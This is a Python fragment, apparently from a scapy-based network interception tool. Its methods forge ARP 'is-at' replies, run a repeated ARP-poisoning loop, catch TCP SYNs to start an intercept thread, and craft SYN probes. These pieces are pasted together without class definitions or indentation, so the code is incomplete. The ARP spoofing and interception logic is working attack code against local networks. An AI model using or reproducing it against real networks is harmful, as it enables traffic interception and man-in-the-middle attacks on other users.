def process(self, pkt):
if all(layer in pkt for layer in (scapy.Ether, scapy.ARP)):
if pkt[scapy.Ether].src != str(net.ifhwaddr(self.iface)) and pkt[scapy.ARP].op == 1: # who-has
resp = scapy.Ether()/scapy.ARP(hwsrc=str(net.ifhwaddr('tap0')), hwdst=pkt.hwsrc, psrc=pkt.pdst, pdst=pkt.psrc, op="is-at")
scapy.sendp(resp, iface='tap0')
if pkt.pdst not in self.ips:
self.ips.add(pkt.pdst)
cidr = '{!s}/{:d}'.format(pkt.pdst, 28)
logger.info("Attaching new IP address {:s} to {:s}".format(cidr, self.iface))
subprocess.run(['ip', 'addr', 'add', cidr, 'dev', self.iface])
def start(self, sniffer):
self.sniffer = sniffer
if self.iface is None:
self.iface = sniffer.iface
if self.hwaddr is None:
self.hwaddr = str(net.ifhwaddr(self.iface))
def run(self):
if self.hwaddr is None:
self.hwaddr = str(net.ifhwaddr(self.iface))
self.arping()
while not self._stopevent.is_set():
self.arpoison()
time.sleep(self.interval)
def process(self, pkt):
if all(layer in pkt for layer in (scapy.Ether, scapy.IP, scapy.TCP)):
logger.debug(pkt.sprintf("[%Ether.src%]%IP.src%:%TCP.sport% > [%Ether.dst%]%IP.dst%:%TCP.dport% %TCP.flags%"))
if pkt[scapy.Ether].dst == str(net.ifhwaddr(self.iface)) and pkt[scapy.TCP].flags == 2:
self.bindaddr, self.bindport = pkt[scapy.IP].dst, pkt[scapy.TCP].dport
if self._thread is None or not self._thread.is_alive():
self._thread = threading.Thread(target=self.intercept)
self._thread.start()
def start(self, sniffer):
self.sniffer = sniffer
if self.sniffer.iface is not None:
self.ignore.add(str(net.ifhwaddr(self.sniffer.iface)))
def tcpprobe(mac, ip, port):
return scapy.Ether(src=str(net.ifhwaddr(iface)), dst=mac)/scapy.IP(src=str(net.ifaddr(iface)), dst=ip)/scapy.TCP(sport=random.randint(32000, 50000), dport=port, flags="S")